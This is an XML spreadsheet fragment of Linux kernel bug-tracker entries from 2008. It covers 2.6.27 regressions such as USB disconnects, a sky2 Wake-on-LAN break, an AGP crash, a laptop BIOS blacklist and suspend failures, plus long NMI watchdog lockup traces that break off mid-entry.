    <t>Subject : USB disconnects every 30 seconds (2.6.27-rc8) Submitter : Dave Hansen &lt;dave@sr71.net&gt; Date : 2008-10-03 17:45 References : http://marc.info/?l=linux-kernel&amp;m=122305738430115&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc8 doubled times</t>
  </si>
  <si>
    <t>2008-10-04 10:53 UTC</t>
  </si>
  <si>
    <t>2008-10-05 03:52 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc8 doubled times Submitter : Hugh Dickins &lt;hugh@veritas.com&gt; Date : 2008-10-03 10:21 References : http://marc.info/?l=linux-kernel&amp;m=122302939313636&amp;w=4 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122307260621434&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc-7: BUG: scheduling while atomic, c1e_idle+0x98/0xe0</t>
  </si>
  <si>
    <t>2.6.27-rc-7</t>
  </si>
  <si>
    <t>2008-10-04 11:33 UTC</t>
  </si>
  <si>
    <t>2008-12-02 19:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc-7: BUG: scheduling while atomic: swapper/0/0x00000102 Submitter : Prakash Punnoor &lt;prakash@punnoor.de&gt; Date : 2008-09-28 17:45 References : http://marc.info/?l=linux-kernel&amp;m=122262403415629&amp;w=4 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sky2 wol regression</t>
  </si>
  <si>
    <t>2008-10-04 11:43 UTC</t>
  </si>
  <si>
    <t>2008-10-22 12:26 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in 2.6.27-rc7: Wake On LAN with sky2 broken Submitter : Tino Keitel &lt;tino.keitel@gmx.de&gt; Date : 2008-09-24 8:05 References : http://marc.info/?l=linux-kernel&amp;m=122224359222164&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122298334522551&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression: kernel crashes after agp gart init</t>
  </si>
  <si>
    <t>2.6.27-rc8-90-gb1f23f5</t>
  </si>
  <si>
    <t>2008-10-06 09:25 UTC</t>
  </si>
  <si>
    <t>2008-10-07 00:08 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27-rc8 Earliest failing kernel version:2.6.27-rc8-57-g96d746c Distribution: debian unstable Hardware Environment: amd64, 4 core Opteron (dual socket), AMD 81xx agp bridge When booting up, the kernel crashes right after emitting the following lines via on the console: [ 0.940510] PCI: Using ACPI for IRQ routing [ 0.944389] pci 0000:04:00.0: BAR 0: can't allocate resource [ 0.985267] agpgart-amd64 0000:04:00.0: AMD 8151 AGP Bridge rev B3 [ 1.022664] agpgart-amd64 0000:04:00.0: AGP aperture is 512M @ 0xc0000000 [ 1.024187] PCI-DMA: using GART IOMMU. [ 1.028053] PCI-DMA: Reserving 256MB of IOMMU area in the AGP aperture Symptoms are - freeze (on 2.6.27-rc8-57-g96d746c) - double fault and freeze (on 2.6.27-rc8-60-g1db9b83 - triple fault/reboot (on 2.6.27-rc8-90-gb1f23f5) The kernel crashes always at the exact same place (triple boot case confirmed via serial console). I've tracked in down with git bisect. I'll now test latest -mainline with this commit reverted (2.6.27-rc8-57-g96d746c) - but I goofed up something else, so it will take a few hours.</t>
  </si>
  <si>
    <t>Blacklist HP 6715s - buggy BIOS</t>
  </si>
  <si>
    <t>2.6.27_rc9</t>
  </si>
  <si>
    <t>2008-10-07 13:11 UTC</t>
  </si>
  <si>
    <t>Nicolas Tritz</t>
  </si>
  <si>
    <t>2008-10-24 22:50 UTC</t>
  </si>
  <si>
    <t>herrmann.der.user</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26* Earliest failing kernel version: 2.6.27* Distribution: Gentoo Hardware Environment: HP Compaq 6715s with AMD Turion 64 x2 Problem Description: Same as bug 11516, fans are always on and cpu is always at 800 MHz. The first workaround was to put pci=noacpi on the kernel cmdline. When I saw the patch "x86 ACPI: Blacklist two HP machines with buggy BIOSes" (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=e84956f92a846246b09b34f2a728329c386d250f), I've just added my 6715s to arch/x86/kernel/acpi/boot.c in the same way as 6715b and it works. So please, can you put this laptop as well ? I don't like the pci=noacpi stuff because I don't know very well what it does on my computer. Steps to reproduce: Grab an HP 6715s and try the 2.6.27 (rc9 or not) on it. (Please be gentle, it's my first bug. :))</t>
  </si>
  <si>
    <t>Pressing suspend button suspends, but does not wakes up on Itautec Note N8320</t>
  </si>
  <si>
    <t>2.6.27-rc*</t>
  </si>
  <si>
    <t>2008-10-07 23:01 UTC</t>
  </si>
  <si>
    <t>Rogério Brito</t>
  </si>
  <si>
    <t>2014-10-28 05:14 UTC</t>
  </si>
  <si>
    <t>Aaron Lu</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.24 Distribution: Ubuntu Intrepid alphas Hardware Environment: Itautec Note N8320 Software Environment: Ubuntu userland Problem Description: I just bougth a small notebook that is based on the ICH8 chipset with a Core 2 Duo T7250 processor and it came bundled with Windows Vista. Under Windows Vista (now, uninstalled), when I press the suspend button, it suspends the machine and when I press the suspend button a second time, the machine wakes up as expected. Unfortunately, with kernels available in Ubuntu (hardy, intrepid), if I press the suspend button, the machine will go to suspend mode, but if I press the button again, the machine powers off. Despite the fact that I'm using a range of Ubuntu kernels, I can install the stock kernel.org (actually, I plan on installing a vanilla Debian with my own compiled kernel) and I can provide as much information is needed (logs, etc). Steps to reproduce: Press the suspend button. Press the suspend button again. Thanks in advance, Rogério Brito.</t>
  </si>
  <si>
    <t>Can't classificate problem. maybe hrtimer data structures got wrecked</t>
  </si>
  <si>
    <t>2008-10-08 02:12 UTC</t>
  </si>
  <si>
    <t>2009-01-29 23:38 UTC</t>
  </si>
  <si>
    <t>We have 10 equal server what do Trafiic Shape (tc (htb, u32, sfq) and iptables) only. Few of them halt one times in week. Timer settings in config: HZ=300 NO_HZ=n HIGH_RES_TIMERS = n Server 1: [321478.840858] BUG: NMI Watchdog detected LOCKUP on CPU3, ip c01fafc7, registers: [321478.840858] Modules linked in: netconsole e1000e i2c_i801 e1000 i2c_core [321478.840858] [321478.840858] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [321478.840858] EIP: 0060:[&lt;c01fafc7&gt;] EFLAGS: 00000082 CPU: 3 [321478.840858] EIP is at rb_insert_color+0x17/0xc0 [321478.840858] EAX: f10294a4 EBX: f10294a4 ECX: 00000000 EDX: f10294a4 [321478.840858] ESI: f10294a4 EDI: f10294a4 EBP: c202d0d4 ESP: f7c5fcac [321478.840858] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [321478.840858] Process swapper (pid: 0, ti=f7c5e000 task=f7c32940 task.ti=f7c5e000) [321478.840858] Stack: f10294a4 00000000 c202d0cc c202d0d4 c013a8ff f10294a4 c202d0cc c20230cc [321478.840858] c04450a0 c013adea 00000000 f7c5fcfc 406ce400 00012461 00000001 00000286 [321478.840858] f1029000 ffffffff 00000000 00000000 c02d15fe 00000000 f1029000 c02d6da6 [321478.840858] Call Trace: [321478.840858] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [321478.840858] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [321478.840858] [&lt;c02d15fe&gt;] qdisc_watchdog_schedule+0x1e/0x30 [321478.840858] [&lt;c02d6da6&gt;] htb_dequeue+0x6a6/0x810 [321478.840858] [&lt;c02d77f7&gt;] sfq_drop+0x1a7/0x260 [321478.840858] [&lt;c02d77f7&gt;] sfq_drop+0x1a7/0x260 [321478.840858] [&lt;c02d14f2&gt;] tc_classify+0x42/0x90 [321478.840858] [&lt;c02d71c0&gt;] htb_enqueue+0x0/0x1e0 [321478.840858] [&lt;c02d047c&gt;] __qdisc_run+0x19c/0x1d0 [321478.840858] [&lt;c02d71c0&gt;] htb_enqueue+0x0/0x1e0 [321478.840858] [&lt;c02c4cb7&gt;] dev_queue_xmit+0x267/0x380 [321478.840858] [&lt;c02e6040&gt;] ip_forward_finish+0x0/0x40 [321478.840858] [&lt;c02e8bef&gt;] ip_finish_output+0x11f/0x280 [321478.840858] [&lt;c02e630f&gt;] ip_forward+0x28f/0x2d0 [321478.840858] [&lt;c02e6065&gt;] ip_forward_finish+0x25/0x40 [321478.840858] [&lt;c02e4ba2&gt;] ip_rcv_finish+0x122/0x360 [321478.840858] [&lt;c016d7e9&gt;] add_partial+0x19/0x60 [321478.840858] [&lt;c016e8d9&gt;] __slab_free+0x169/0x290 [321478.840858] [&lt;c016e8d9&gt;] __slab_free+0x169/0x290 [321478.840858] [&lt;c02e5020&gt;] ip_rcv+0x0/0x290 [321478.840858] [&lt;c02c1b4b&gt;] netif_receive_skb+0x26b/0x470 [321478.840858] [&lt;f886b74d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [321478.840858] [&lt;f886e9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [321478.840858] [&lt;f886af59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [321478.840858] [&lt;c02c3f58&gt;] net_rx_action+0xf8/0x1b0 [321478.840858] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [321478.840858] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [321478.840858] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [321478.840858] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [321478.840858] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [321478.840858] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [321478.840858] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [321478.840858] ======================= [321478.840858] Code: 24 83 c4 0c c3 89 56 04 eb e3 8d 76 00 8d bc 27 00 00 00 00 55 89 d5 57 89 c7 56 53 90 8d b4 26 00 00 00 00 8b 1f 83 e3 fc 74 32 &lt;8b&gt; 03 89 d9 a8 01 75 2a 89 c6 83 e6 fc 8b 56 08 39 d3 74 45 85 [ 2251.728719] BUG: NMI Watchdog detected LOCKUP on CPU3, ip c01fafd4, registers: [ 2251.728719] Modules linked in: netconsole i2c_i801 i2c_core e1000e e1000 [ 2251.728719] [ 2251.728719] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [ 2251.728719] EIP: 0060:[&lt;c01fafd4&gt;] EFLAGS: 00000082 CPU: 3 [ 2251.728719] EIP is at rb_insert_color+0x24/0xc0 [ 2251.728719] EAX: f6c134a4 EBX: f6c134a4 ECX: f6c134a4 EDX: f6c134a4 [ 2251.728719] ESI: f6c134a4 EDI: f6c134a4 EBP: c202d0d4 ESP: f7c5fcac [ 2251.728719] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 2251.728719] Process swapper (pid: 0, ti=f7c5e000 task=f7c32940 task.ti=f7c5e000) [ 2251.728719] Stack: f6c134a4 00000000 c202d0cc c202d0d4 c013a8ff f6c134a4 c202d0cc c20230cc [ 2251.728719] c04450a0 c013adea 00000000 f7c5fcfc 392e7c00 0000020c 00000001 00000286 [ 2251.728719] f6c13000 ffffffff 00000000 00000000 c02d15fe 00000000 f6c13000 c02d6da6 [ 2251.728719] Call Trace: [ 2251.728719] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [ 2251.728719] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [ 2251.728719] [&lt;c02d15fe&gt;] qdisc_watchdog_schedule+0x1e/0x30 [ 2251.728719] [&lt;c02d6da6&gt;] htb_dequeue+0x6a6/0x810 [ 2251.728719] [&lt;c02d047c&gt;] __qdisc_run+0x19c/0x1d0 [ 2251.728719] [&lt;c02d71c0&gt;] htb_enqueue+0x0/0x1e0 [ 2251.728719] [&lt;c02c4cb7&gt;] dev_queue_xmit+0x267/0x380 [ 2251.728719] [&lt;c02e6040&gt;] ip_forward_finish+0x0/0x40 [ 2251.728719] [&lt;c02e8bef&gt;] ip_finish_output+0x11f/0x280 [ 2251.728719] [&lt;c02e630f&gt;] ip_forward+0x28f/0x2d0 [ 2251.728719] [&lt;c02e6065&gt;] ip_forward_finish+0x25/0x40 [ 2251.728719] [&lt;c02e4ba2&gt;] ip_rcv_finish+0x122/0x360 [ 2251.728719] [&lt;c016d7e9&gt;] add_partial+0x19/0x60 [ 2251.728719] [&lt;c016e8d9&gt;] __slab_free+0x169/0x290 [ 2251.728719] [&lt;c02e5020&gt;] ip_rcv+0x0/0x290 [ 2251.728719] [&lt;c02c1b4b&gt;] netif_receive_skb+0x26b/0x470 [ 2251.728719] [&lt;f886c74d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [ 2251.728719] [&lt;f886f9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [ 2251.728719] [&lt;f886bf59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [ 2251.728719] [&lt;c02c3f58&gt;] net_rx_action+0xf8/0x1b0 [ 2251.728719] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [ 2251.728719] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [ 2251.728719] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [ 2251.728719] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [ 2251.728719] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [ 2251.728719] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [ 2251.728719] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [ 2251.728719] ======================= [ 2251.728719] Code: 8d bc 27 00 00 00 00 55 89 d5 57 89 c7 56 53 90 8d b4 26 00 00 00 00 8b 1f 83 e3 fc 74 32 8b 03 89 d9 a8 01 75 2a 89 c6 83 e6 fc &lt;8b&gt; 56 08 39 d3 74 45 85 d2 74 25 8b 02 a8 01 75 1f 83 c8 01 89 [196496.545559] BUG: NMI Watchdog detected LOCKUP on CPU3, ip c01faf4c, registers: [196496.545559] Modules linked in: netconsole i2c_i801 e1000e e1000 i2c_core [196496.545559] [196496.545559] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [196496.545559] EIP: 0060:[&lt;c01faf4c&gt;] EFLAGS: 00000096 CPU: 3 [196496.545559] EIP is at __rb_rotate_right+0xc/0x70 [196496.545559] EAX: f741f4a4 EBX: f741f4a4 ECX: f741f4a4 EDX: c202d0d4 [196496.545559] ESI: f741f4a4 EDI: f741f4a4 EBP: c202d0d4 ESP: f7c5fc9c [196496.545559] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [196496.545559] Process swapper (pid: 0, ti=f7c5e000 task=f7c32940 task.ti=f7c5e000) [196496.545559] Stack: f741f4a4 f741f4a4 f741f4a4 c01fb041 f741f4a4 00000000 c202d0cc c202d0d4 [196496.545559] c013a8ff f741f4a4 c202d0cc c20230cc c04450a0 c013adea 00000000 f7c5fcfc [196496.545559] 8af6d400 0000b2b5 00000001 00000286 f741f000 ffffffff 00000000 00000000 [196496.545559] Call Trace: [196496.545559] [&lt;c01fb041&gt;] rb_insert_color+0x91/0xc0 [196496.545559] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [196496.545559] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [196496.545559] [&lt;c02d15fe&gt;] qdisc_watchdog_schedule+0x1e/0x30 [196496.545559] [&lt;c02d6da6&gt;] htb_dequeue+0x6a6/0x810 [196496.545559] [&lt;c02d047c&gt;] __qdisc_run+0x19c/0x1d0 [196496.545559] [&lt;c02d71c0&gt;] htb_enqueue+0x0/0x1e0 [196496.545559] [&lt;c02c4cb7&gt;] dev_queue_xmit+0x267/0x380 [196496.545559] [&lt;c02e6040&gt;] ip_forward_finish+0x0/0x40 [196496.545559] [&lt;c02e8bef&gt;] ip_finish_output+0x11f/0x280 [196496.545559] [&lt;c02e630f&gt;] ip_forward+0x28f/0x2d0 [196496.545559] [&lt;c02e6065&gt;] ip_forward_finish+0x25/0x40 [196496.545559] [&lt;c02e4ba2&gt;] ip_rcv_finish+0x122/0x360 [196496.545559] [&lt;c02be072&gt;] __netdev_alloc_skb+0x22/0x50 [196496.545559] [&lt;c033091c&gt;] notifier_call_chain+0x3c/0x80 [196496.545559] [&lt;c02e5020&gt;] ip_rcv+0x0/0x290 [196496.545559] [&lt;c02c1b4b&gt;] netif_receive_skb+0x26b/0x470 [196496.545559] [&lt;c02be072&gt;] __netdev_alloc_skb+0x22/0x50 [196496.545559] [&lt;f886774d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [196496.545559] [&lt;f886a9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [196496.545559] [&lt;f8866f59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [196496.545559] [&lt;c02c3f58&gt;] net_rx_action+0xf8/0x1b0 [196496.545559] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [196496.545559] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [196496.545559] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [196496.545559] [&lt;c0114077&gt;] smp_apic_timer_interrupt+0x57/0x90 [196496.545559] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [196496.545559] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [196496.545559] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [196496.545559] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [196496.545559] ======================= [196496.545559] Code: 24 08 83 e0 03 09 d0 89 03 8b 1c 24 83 c4 0c c3 89 56 08 eb e3 8d 76 00 8d bc 27 00 00 00 00 83 ec 0c 89 1c 24 89 c3 89 7c 24 08 &lt;89&gt; d7 89 74 24 04 8b 50 08 8b 30 8b 4a 04 83 e6 fc 85 c9 89 48 [23749.920305] BUG: NMI Watchdog detected LOCKUP on CPU3, ip c01faed0, registers: [23749.920305] Modules linked in: netconsole e1000e i2c_i801 e1000 i2c_core [23749.920305] [23749.920305] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [23749.920305] EIP: 0060:[&lt;c01faed0&gt;] EFLAGS: 00000082 CPU: 3 [23749.920305] EIP is at __rb_rotate_left+0x0/0x70 [23749.920305] EAX: f72914a4 EBX: f72914a4 ECX: f72914a4 EDX: c202d0d4 [23749.920305] ESI: f72914a4 EDI: f72914a4 EBP: c202d0d4 ESP: f7c5fca8 [23749.920305] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [23749.920305] Process swapper (pid: 0, ti=f7c5e000 task=f7c32940 task.ti=f7c5e000) [23749.920305] Stack: c01fb018 f72914a4 00000000 c202d0cc c202d0d4 c013a8ff f72914a4 c202d0cc [23749.920305] c20190cc c04450a0 c013adea 00000000 f7c5fcfc d5dfdc00 00001598 00000001 [23749.920305] 00000286 f7291000 ffffffff 00000000 00000000 c02d15fe 00000000 f7291000 [23749.920305] Call Trace: [23749.920305] [&lt;c01fb018&gt;] rb_insert_color+0x68/0xc0 [23749.920305] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [23749.920305] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [23749.920305] [&lt;c02d15fe&gt;] qdisc_watchdog_schedule+0x1e/0x30 [23749.920305] [&lt;c02d6da6&gt;] htb_dequeue+0x6a6/0x810 [23749.920305] [&lt;c02d047c&gt;] __qdisc_run+0x19c/0x1d0 [23749.920305] [&lt;c02d71c0&gt;] htb_enqueue+0x0/0x1e0 [23749.920305] [&lt;c02c4cb7&gt;] dev_queue_xmit+0x267/0x380 [23749.920305] [&lt;c02e6040&gt;] ip_forward_finish+0x0/0x40 [23749.920305] [&lt;c02e8bef&gt;] ip_finish_output+0x11f/0x280 [23749.920305] [&lt;c02e630f&gt;] ip_forward+0x28f/0x2d0 [23749.920305] [&lt;c02e6065&gt;] ip_forward_finish+0x25/0x40 [23749.920305] [&lt;c02e4ba2&gt;] ip_rcv_finish+0x122/0x360 [23749.920305] [&lt;c02bd007&gt;] __alloc_skb+0x57/0x120 [23749.920305] [&lt;c02e5020&gt;] ip_rcv+0x0/0x290 [23749.920305] [&lt;c02c1b4b&gt;] netif_receive_skb+0x26b/0x470 [23749.920305] [&lt;c02be072&gt;] __netdev_alloc_skb+0x22/0x50 [23749.920305] [&lt;f886774d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [23749.920305] [&lt;f886a9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [23749.920305] [&lt;f8866f59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [23749.920305] [&lt;c02c3f58&gt;] net_rx_action+0xf8/0x1b0 [23749.920305] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [23749.920305] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [23749.920305] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [23749.920305] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [23749.920305] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [23749.920305] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [23749.920305] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [23749.920305] ======================= [23749.920305] Code: 35 3a c0 e8 c3 b0 f2 ff b8 01 00 00 00 8b 5c 24 0c 8b 74 24 10 8b 7c 24 14 83 c4 18 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 &lt;83&gt; ec 0c 89 1c 24 89 c3 89 7c 24 08 89 d7 89 74 24 04 8b 50 04 Server 2: [17053.718192] BUG: NMI Watchdog detected LOCKUP on CPU1, ip c01fb02d, registers: [17053.718192] Modules linked in: netconsole e1000e i2c_i801 e1000 i2c_core [17053.718192] [17053.718192] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [17053.718192] EIP: 0060:[&lt;c01fb02d&gt;] EFLAGS: 00000046 CPU: 1 [17053.718192] EIP is at rb_insert_color+0x7d/0xc0 [17053.718192] EAX: f3412ca4 EBX: f3412ca4 ECX: f3412ca4 EDX: 00000000 [17053.718192] ESI: f3412ca4 EDI: f3412ca4 EBP: c20190d4 ESP: f7c4dcac [17053.718192] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [17053.718192] Process swapper (pid: 0, ti=f7c4c000 task=f7c314a0 task.ti=f7c4c000) [17053.718192] Stack: f3412ca4 00000000 c20190cc c20190d4 c013a8ff f3412ca4 c20190cc c200f0cc [17053.718192] c044b0a0 c013adea 00000000 f7c4dcfc c121d800 00000f81 00000001 00000286 [17053.718192] f3412800 ffffffff 00000000 00000000 c02d527e 00000000 f3412800 c02daa26 [17053.718192] Call Trace: [17053.718192] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [17053.718192] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [17053.718192] [&lt;c02d527e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [17053.718192] [&lt;c02daa26&gt;] htb_dequeue+0x6a6/0x810 [17053.718192] [&lt;c02d40fc&gt;] __qdisc_run+0x19c/0x1d0 [17053.718192] [&lt;c02dae40&gt;] htb_enqueue+0x0/0x1e0 [17053.718192] [&lt;c02c86b7&gt;] dev_queue_xmit+0x267/0x380 [17053.718192] [&lt;c02e9cc0&gt;] ip_forward_finish+0x0/0x40 [17053.718192] [&lt;c02ec86f&gt;] ip_finish_output+0x11f/0x280 [17053.718192] [&lt;c02e9f8f&gt;] ip_forward+0x28f/0x2d0 [17053.718192] [&lt;c02e9ce5&gt;] ip_forward_finish+0x25/0x40 [17053.718192] [&lt;c02e8822&gt;] ip_rcv_finish+0x122/0x360 [17053.718192] [&lt;c02c0777&gt;] __alloc_skb+0x57/0x120 [17053.718192] [&lt;c02bfe68&gt;] __kfree_skb+0x8/0x80 [17053.718192] [&lt;f883565b&gt;] e1000_unmap_and_free_tx_resource+0x5b/0x80 [e1000] [17053.718192] [&lt;c02e8ca0&gt;] ip_rcv+0x0/0x290 [17053.718192] [&lt;c02c54fb&gt;] netif_receive_skb+0x26b/0x470 [17053.718192] [&lt;f886b74d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [17053.718192] [&lt;f886e9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [17053.718192] [&lt;f886af59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [17053.718192] [&lt;c02c790b&gt;] net_rx_action+0xfb/0x200 [17053.718192] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [17053.718192] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [17053.718192] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [17053.718192] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [17053.718192] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [17053.718192] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [17053.718192] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [17053.718192] ======================= [17053.718192] Code: 5d c3 3b 7b 08 74 3d 83 09 01 89 ea 89 f0 83 26 fe e8 b8 fe ff ff eb a6 8d b6 00 00 00 00 8b 56 04 85 d2 74 06 8b 02 a8 01 74 b8 &lt;3b&gt; 7b 04 74 23 83 09 01 89 ea 89 f0 83 26 fe e8 ff fe ff ff e9 [75131.217107] BUG: NMI Watchdog detected LOCKUP on CPU0, ip c01fb037, registers: [75131.217107] Modules linked in: netconsole i2c_i801 e1000e i2c_core e1000 [75131.217107] [75131.217107] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [75131.217107] EIP: 0060:[&lt;c01fb037&gt;] EFLAGS: 00000086 CPU: 0 [75131.217107] EIP is at rb_insert_color+0x87/0xc0 [75131.217107] EAX: f56bb4a4 EBX: f56bb4a4 ECX: f56bb4a4 EDX: c200f0d4 [75131.217107] ESI: f56bb4a4 EDI: f56bb4a4 EBP: c200f0d4 ESP: c0411cdc [75131.217107] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [75131.217107] Process swapper (pid: 0, ti=c0410000 task=c03df340 task.ti=c0410000) [75131.217107] Stack: f56bb4a4 00000000 c200f0cc c200f0d4 c013a8ff f56bb4a4 c200f0cc c200f0cc [75131.217107] c044b0a0 c013adea c013d06d c0411d2c d940e400 00004454 00000000 00000286 [75131.217107] f56bb000 ffffffff 00000000 00000000 c02d527e 00000000 f56bb000 c02daa26 [75131.217107] Call Trace: [75131.217107] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [75131.217107] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [75131.217107] [&lt;c013d06d&gt;] getnstimeofday+0x3d/0xe0 [75131.217107] [&lt;c02d527e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [75131.217107] [&lt;c02daa26&gt;] htb_dequeue+0x6a6/0x810 [75131.217107] [&lt;c02d40fc&gt;] __qdisc_run+0x19c/0x1d0 [75131.217107] [&lt;c02dae40&gt;] htb_enqueue+0x0/0x1e0 [75131.217107] [&lt;c02c86b7&gt;] dev_queue_xmit+0x267/0x380 [75131.217107] [&lt;c02e9cc0&gt;] ip_forward_finish+0x0/0x40 [75131.217107] [&lt;c02ec86f&gt;] ip_finish_output+0x11f/0x280 [75131.217107] [&lt;c02e9f8f&gt;] ip_forward+0x28f/0x2d0 [75131.217107] [&lt;c02e9ce5&gt;] ip_forward_finish+0x25/0x40 [75131.217107] [&lt;c02e8822&gt;] ip_rcv_finish+0x122/0x360 [75131.217107] [&lt;c02c17e2&gt;] __netdev_alloc_skb+0x22/0x50 [75131.217107] [&lt;c02e8ca0&gt;] ip_rcv+0x0/0x290 [75131.217107] [&lt;c02c54fb&gt;] netif_receive_skb+0x26b/0x470 [75131.217107] [&lt;c02c17e2&gt;] __netdev_alloc_skb+0x22/0x50 [75131.217107] [&lt;f886c74d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [75131.217107] [&lt;f886f9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [75131.217107] [&lt;f886bf59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [75131.217107] [&lt;c02c790b&gt;] net_rx_action+0xfb/0x200 [75131.217107] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [75131.217107] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [75131.217107] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [75131.217107] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [75131.217107] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [75131.217107] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [75131.217107] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [75131.217107] ======================= [75131.217107] Code: 89 ea 89 f0 83 26 fe e8 b8 fe ff ff eb a6 8d b6 00 00 00 00 8b 56 04 85 d2 74 06 8b 02 a8 01 74 b8 3b 7b 04 74 23 83 09 01 89 ea &lt;89&gt; f0 83 26 fe e8 ff fe ff ff e9 7a ff ff ff 89 ea 89 d8 e8 f1 [176617.218140] BUG: NMI Watchdog detected LOCKUP on CPU1, ip c01faee7, registers: [176617.218140] Modules linked in: netconsole e1000e e1000 i2c_i801 i2c_core [176617.218140] [176617.218140] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [176617.218140] EIP: 